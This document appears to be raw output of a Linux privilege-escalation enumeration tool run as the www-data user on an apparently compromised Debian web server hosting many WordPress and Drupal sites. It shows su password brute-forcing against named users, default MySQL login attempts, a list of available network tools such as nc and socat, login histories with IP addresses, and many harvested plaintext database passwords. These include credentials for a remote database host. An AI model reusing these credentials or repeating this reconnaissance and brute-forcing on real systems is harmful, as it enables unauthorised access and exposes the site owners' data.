╔══════════╣ Iptables rules iptables rules Not Found  ╔══════════╣ Active Ports ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports tcp LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* tcp LISTEN 0 4096 0.0.0.0:5355 0.0.0.0:* tcp LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* tcp LISTEN 0 100 127.0.0.1:25 0.0.0.0:* tcp LISTEN 0 511 *:80 *:* tcp LISTEN 0 4096 *:22 *:* tcp LISTEN 0 100 [::1]:25 [::]:* tcp LISTEN 0 4096 [::]:5355 [::]:* tcp LISTEN 0 511 *:9000 *:* ╔══════════╣ Can I sniff with tcpdump? No   ╔═══════════════════╗ ═══════════════════════════════╣ Users Information ╠═══════════════════════════════  ╚═══════════════════╝ ╔══════════╣ My user ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#users uid=33(www-data) gid=33(www-data) groups=33(www-data) ╔══════════╣ Do I have PGP keys? gpg Not Found netpgpkeys Not Found netpgp Not Found  ╔══════════╣ Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid  ╔══════════╣ Checking sudo tokens ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#reusing-sudo-tokens ptrace protection is enabled (1) ╔══════════╣ Checking Pkexec policy ╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe#pe-method-2  [Configuration] AdminIdentities=unix-user:0 [Configuration] AdminIdentities=unix-group:sudo ╔══════════╣ Superusers root:x:0:0:root:/root:/bin/bash ╔══════════╣ Users with console daoud:x:1000:1000:daoud hassiba,,,:/home/daoud:/bin/bash fdmingcri:x:1001:1001:cri,,,:/home/fdmingcri:/bin/bash root:x:0:0:root:/root:/bin/bash ╔══════════╣ All users & groups uid=0(root) gid=0(root) groups=0(root) uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m) uid=10(uucp) gid=10(uucp) groups=10(uucp) uid=100(_apt) gid=65534(nogroup) groups=65534(nogroup) uid=1000(daoud) gid=1000(daoud) groups=1000(daoud) uid=1001(fdmingcri) gid=1001(fdmingcri) groups=1001(fdmingcri) uid=101(postfix) gid=106(postfix) groups=106(postfix) uid=102(sshd) gid=65534(nogroup) groups=65534(nogroup) uid=103(systemd-timesync) gid=110(systemd-timesync) groups=110(systemd-timesync) uid=104(systemd-network) gid=112(systemd-network) groups=112(systemd-network) uid=105(systemd-resolve) gid=113(systemd-resolve) groups=113(systemd-resolve) uid=106(messagebus) gid=114(messagebus) groups=114(messagebus) uid=107(mysql) gid=115(mysql) groups=115(mysql) uid=13(proxy) gid=13(proxy) groups=13(proxy) uid=2(bin) gid=2(bin) groups=2(bin) uid=3(sys) gid=3(sys) groups=3(sys) uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=34(backup) gid=34(backup) groups=34(backup) uid=38(list) gid=38(list) groups=38(list) uid=39(irc) gid=39(irc) groups=39(irc) uid=4(sync) gid=65534(nogroup) groups=65534(nogroup) uid=41(gnats) gid=41(gnats) groups=41(gnats) uid=5(games) gid=60(games) groups=60(games) uid=6(man) gid=12(man) groups=12(man) uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup) uid=7(lp) gid=7(lp) groups=7(lp) uid=8(mail) gid=8(mail) groups=8(mail) uid=9(news) gid=9(news) groups=9(news) uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump) ╔══════════╣ Login now  09:07:35 up 2 days, 20:38, 0 users, load average: 0.51, 0.73, 0.51 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT ╔══════════╣ Last logons daoud pts/3 Thu Jan 19 09:47:19 2023 - Thu Jan 19 12:01:04 2023 (02:13) 10.1.0.12 daoud pts/3 Mon Jan 16 08:53:39 2023 - Mon Jan 16 08:53:52 2023 (00:00) 10.1.0.12 daoud pts/4 Mon Jan 16 08:51:34 2023 - Mon Jan 16 10:06:08 2023 (01:14) 10.1.0.12 reboot system boot Mon Jan 16 08:49:05 2023 - Mon Jan 23 12:01:19 2023 (7+03:12) 0.0.0.0 daoud pts/3 Sat Jan 14 07:44:55 2023 - Sat Jan 14 09:30:58 2023 (01:46) 197.204.220.65 reboot system boot Fri Jan 13 18:31:14 2023 - Mon Jan 16 08:49:01 2023 (2+14:17) 0.0.0.0 reboot system boot Wed Jan 11 07:01:00 2023 - Mon Jan 16 08:49:01 2023 (5+01:48) 0.0.0.0 reboot system boot Tue Jan 3 09:28:54 2023 - Tue Jan 3 10:15:39 2023 (00:46) 0.0.0.0 wtmp begins Tue Jan 3 09:28:54 2023 ╔══════════╣ Last time logon each user Username Port From Latest daoud pts/3 10.1.0.11 Thu Jan 25 09:41:07 +0000 2024 fdmingcri pts/3 10.1.0.12 Sun Nov 26 12:21:55 +0000 2023 ╔══════════╣ Password policy PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ╔══════════╣ Testing 'su' as other users with shell using as passwords: null pwd, the username and top2000pwds   Bruteforcing user root... Bruteforcing user daoud... Bruteforcing user fdmingcri... ╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!    ╔══════════════════════╗ ═════════════════════════════╣ Software Information ╠═════════════════════════════  ╚══════════════════════╝ ╔══════════╣ Useful software /usr/bin/base64 /usr/bin/curl /bin/nc /bin/nc.traditional /bin/netcat /usr/bin/perl /usr/bin/php /bin/ping /usr/bin/python3 /usr/bin/socat /usr/bin/wget ╔══════════╣ Installed Compilers  ╔══════════╣ MySQL version mysql Ver 15.1 Distrib 10.5.21-MariaDB, for debian-linux-gnu (x86_64) using EditLine wrapper ═╣ MySQL connection using default root/root ........... No ═╣ MySQL connection using root/toor ................... No ═╣ MySQL connection using root/NOPASS ................. No  ╔══════════╣ Searching mysql credentials and exec From '/etc/mysql/mariadb.conf.d/50-server.cnf' Mysql user: user = mysql Found readable /etc/mysql/my.cnf [client-server] socket = /run/mysqld/mysqld.sock !includedir /etc/mysql/conf.d/ !includedir /etc/mysql/mariadb.conf.d/ ╔══════════╣ Analyzing MariaDB Files (limit 70) -rw-r--r-- 1 root root 1126 Feb 18 2022 /etc/mysql/mariadb.cnf [client-server] socket = /run/mysqld/mysqld.sock !includedir /etc/mysql/conf.d/ !includedir /etc/mysql/mariadb.conf.d/ -rw------- 1 root root 544 Jan 19 2023 /etc/mysql/debian.cnf ╔══════════╣ Analyzing Apache-Nginx Files (limit 70) Apache version: Server version: Apache/2.4.56 (Debian) Server built: 2023-04-02T03:06:01 httpd Not Found  Nginx version: nginx Not Found  /etc/apache2/mods-enabled/php8.1.conf- /etc/apache2/mods-enabled/php8.1.conf: SetHandler application/x-httpd-php -- /etc/apache2/mods-enabled/php8.1.conf- /etc/apache2/mods-enabled/php8.1.conf: SetHandler application/x-httpd-php-source -- /etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/doc/html/faq.html- AddType text/html .php /etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/doc/html/faq.html: AddHandler application/x-httpd-php .php -- /etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/doc/html/faq.html-
# mod_gzip_item_include file \.php$
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/doc/html/faq.html:# mod_gzip_item_include mime "application/x-httpd-php.*"
--
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/doc/html/faq.html-

and

/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/doc/html/faq.html:
AddType application/x-httpd-php .php
--
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/doc/html/_sources/faq.rst.txt-           AddType text/html .php
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/doc/html/_sources/faq.rst.txt:           AddHandler application/x-httpd-php .php
--
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/doc/html/_sources/faq.rst.txt-    # mod_gzip_item_include file \.php$
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/doc/html/_sources/faq.rst.txt:    # mod_gzip_item_include mime "application/x-httpd-php.*"
--
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/doc/html/_sources/faq.rst.txt-
/etc/apache2/conf-available/phpMyAdmin-5.2.0-all-languages/doc/html/_sources/faq.rst.txt:    AddType application/x-httpd-php .php
--
/etc/apache2/mods-available/php8.1.conf-
/etc/apache2/mods-available/php8.1.conf:    SetHandler application/x-httpd-php
--
/etc/apache2/mods-available/php8.1.conf-
/etc/apache2/mods-available/php8.1.conf:    SetHandler application/x-httpd-php-source
══╣ PHP exec extensions
drwxr-xr-x 2 root root 4096 Feb 13  2023 /etc/apache2/sites-enabled
drwxr-xr-x 2 root root 4096 Feb 13  2023 /etc/apache2/sites-enabled
lrwxrwxrwx 1 root root 35 Jan 14  2023 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf

	ServerAdmin webmaster@localhost
	DocumentRoot /srv/web
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined

lrwxrwxrwx 1 root root 34 Feb 13  2023 /etc/apache2/sites-enabled/phpmyadmin.conf -> ../sites-available/phpmyadmin.conf

ServerAdmin webmaster@localhost
DocumentRoot /opt/phpMyAdmin
 

Options Indexes FollowSymLinks
AllowOverride none
Require all granted

ErrorLog ${APACHE_LOG_DIR}/error_phpmyadmin.log
CustomLog ${APACHE_LOG_DIR}/access_phpmyadmin.log combined



-rw-r--r-- 1 root root 1327 Feb 12  2023 /etc/apache2/sites-available/000-default.conf

	ServerAdmin webmaster@localhost
	DocumentRoot /srv/web
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined

lrwxrwxrwx 1 root root 35 Jan 14  2023 /etc/apache2/sites-enabled/000-default.conf -> ../sites-available/000-default.conf

	ServerAdmin webmaster@localhost
	DocumentRoot /srv/web
	ErrorLog ${APACHE_LOG_DIR}/error.log
	CustomLog ${APACHE_LOG_DIR}/access.log combined


-rw-r--r-- 1 root root 73141 Feb 13  2023 /etc/php/8.1/apache2/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 73137 Jan 13  2023 /etc/php/8.1/cli/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On
-rw-r--r-- 1 root root 73141 Jan 13  2023 /etc/php/8.1/fpm/php.ini
allow_url_fopen = On
allow_url_include = Off
odbc.allow_persistent = On
mysqli.allow_persistent = On
pgsql.allow_persistent = On


drwxr-xr-x 2 root root 4096 Jan 19  2023 /usr/share/javascript/codemirror/mode/nginx


╔══════════╣ Analyzing Wordpress Files (limit 70)
-rw-r--r-- 1 root root 2978 Apr 10  2023 /srv/web/lbcm_wp/wp-config.php
define( 'DB_NAME', 'bd_lbcm' );
define( 'DB_USER', 'root' );
define( 'DB_PASSWORD', 'dsjdsvhj54' );
define( 'DB_HOST', 'localhost' );
-rw-r--r-- 1 root root 2979 Jun  5  2023 /srv/web/lbeig_wp/wp-config.php
define( 'DB_NAME', 'bd_lbeig' );
define( 'DB_USER', 'root' );
define( 'DB_PASSWORD', 'dsjdsvhj54' );
define( 'DB_HOST', 'localhost' );
-rw-r--r-- 1 root root 2978 Apr 10  2023 /srv/web/lbpo_wp/wp-config.php
define( 'DB_NAME', 'bd_lbpo' );
define( 'DB_USER', 'root' );
define( 'DB_PASSWORD', 'dsjdsvhj54' );
define( 'DB_HOST', 'localhost' );
-rw-r--r-- 1 root root 3001 Apr 10  2023 /srv/web/ldb_wp-xx/wp-config.php
define( 'DB_NAME', 'database_name_here' );
define( 'DB_USER', 'username_here' );
define( 'DB_PASSWORD', 'password_here' );
define( 'DB_HOST', 'localhost' );
-rw-r--r-- 1 root root 2977 Apr 10  2023 /srv/web/ldb_wp/wp-config.php
define( 'DB_NAME', 'bd_ldb' );
define( 'DB_USER', 'root' );
define( 'DB_PASSWORD', 'dsjdsvhj54' );
define( 'DB_HOST', 'localhost' );
-rw-r--r-- 1 root root 2978 Apr 10  2023 /srv/web/leve_wp/wp-config.php
define( 'DB_NAME', 'bd_leve' );
define( 'DB_USER', 'root' );
define( 'DB_PASSWORD', 'dsjdsvhj54' );
define( 'DB_HOST', 'localhost' );
-rw-r--r-- 1 root root 2979 Apr 10  2023 /srv/web/lobem_wp/wp-config.php
define( 'DB_NAME', 'bd_lobem' );
define( 'DB_USER', 'root' );
define( 'DB_PASSWORD', 'dsjdsvhj54' );
define( 'DB_HOST', 'localhost' );
-rw-r--r-- 1 root root 2978 Apr 10  2023 /srv/web/lrza_wp/wp-config.php
define( 'DB_NAME', 'bd_lrza' );
define( 'DB_USER', 'root' );
define( 'DB_PASSWORD', 'dsjdsvhj54' );
define( 'DB_HOST', 'localhost' );
-rw-r--r-- 1 root root 3275 Nov 26 13:00 /srv/web/sitelabo/wp-config.php
define( 'DB_NAME', 'test0' );
define( 'DB_USER', 'root' );
define( 'DB_PASSWORD', 'dsjdsvhj54' );
define( 'DB_HOST', 'localhost' );
-rwxrwxrwx 1 root root 3181 Nov  9 13:14 /srv/web/test/wp-config.php
define( 'DB_NAME', 'test-wp' );
define( 'DB_USER', 'root' );
define( 'DB_PASSWORD', 'dsjdsvhj54' );
define( 'DB_HOST', 'localhost' );

╔══════════╣ Analyzing Drupal Files (limit 70)
-rwxr-xr-x 1 daoud daoud 33342 Oct 11  2022 /home/daoud/lbcm/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lbcm-bd',
  'username' => 'root',
  'password' => 'mr43gh98',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-r-xr-xr-x 1 daoud daoud 33342 Oct 11  2022 /home/daoud/lbpo/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lbpo_bd',
  'username' => 'root',
  'password' => 'mr43gh98',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 daoud daoud 33341 Oct 11  2022 /home/daoud/ldb/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'ldb-bd',
  'username' => 'root',
  'password' => 'mr43gh98',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-r-xr-xr-x 1 daoud daoud 33341 Oct 11  2022 /home/daoud/lee/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lee_bd',
  'username' => 'root',
  'password' => 'mr43gh98',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 daoud daoud 33342 Oct 11  2022 /home/daoud/leve/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'leve-bd',
  'username' => 'root',
  'password' => 'mr43gh98',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-r-xr-xr-x 1 daoud daoud 33343 Oct 11  2022 /home/daoud/lobem/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lobem_bd',
  'username' => 'root',
  'password' => 'mr43gh98',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-r-xr-xr-x 1 daoud daoud 33342 Oct 11  2022 /home/daoud/lrza/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lrza-bd',
  'username' => 'root',
  'password' => 'mr43gh98',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rw-r--r-- 1 www-data www-data 33395 May  7  2023 /srv/web/drupal-10.0.0/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * 'prefix' setting. If a prefix is specified, the table name will be prepended
 * alphanumeric and underscore. If no prefix is desired, do not set the 'prefix'
 *   'prefix' => 'main_',
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
-rw-r--r-- 1 www-data www-data 33488 Feb 14 04:28 /srv/web/drupal-9.4.10/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * 'prefix' setting. If a prefix is specified, the table name will be prepended
 * alphanumeric and underscore. If no prefix is desired, do not set the 'prefix'
 *   'prefix' => 'main_',
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lzbnuumy_ojs',
  'username' => 'lzbnuumy_oj',
  'password' => 'adminojs100',
  'prefix' => 'drupal_',
  'host' => '162.241.219.206',
  'port' => '3306',
  'driver' => 'mysql',
-rwxrwxrwx 1 www-data www-data 33344 Feb 13  2023 /srv/web/lbcm-9-4-8/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lbcm-bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 www-data www-data 33343 Feb 21  2023 /srv/web/lbcm/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lbcm-bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 root root 33343 Feb 21  2023 /srv/web/lbcm9-5-0/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lbcm-bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxrwxrwx 1 www-data www-data 33344 Feb 13  2023 /srv/web/lbpo-9-4-8/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lbpo_bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 root root 33343 Feb 26  2023 /srv/web/lbpo/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
 *     'driver' => 'sqlite',
 *     'database' => '/path/to/databasefilename',
 *     'driver' => 'my_driver',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
 *     'host' => 'localhost',
 *     'prefix' => '',
  'database' => 'lbpo_bd',
  'username' => 'root',
  'password' => 'dsjdsvhj54',
  'prefix' => '',
  'host' => 'localhost',
  'port' => '3306',
  'driver' => 'mysql',
-rwxr-xr-x 1 root root 33343 Feb 26  2023 /srv/web/lbpo9-5-0/sites/default/settings.php
 *   'database' => 'databasename',
 *   'username' => 'sqlusername',
 *   'password' => 'sqlpassword',
 *   'host' => 'localhost',
 *   'port' => '3306',
 *   'driver' => 'mysql',
 *   'prefix' => '',
 * by using the 'prefix' setting. If a prefix is specified, the table
 * To have all database names prefixed, set 'prefix' as a string:
 *   'prefix' => 'main_',
 * To provide prefixes for specific tables, set 'prefix' as an array.
 *   'prefix' => [
 *   'prefix' => [
 *     'driver' => 'pgsql',
 *     'database' => 'databasename',
 *     'username' => 'sqlusername',
 *     'password' => 'sqlpassword',
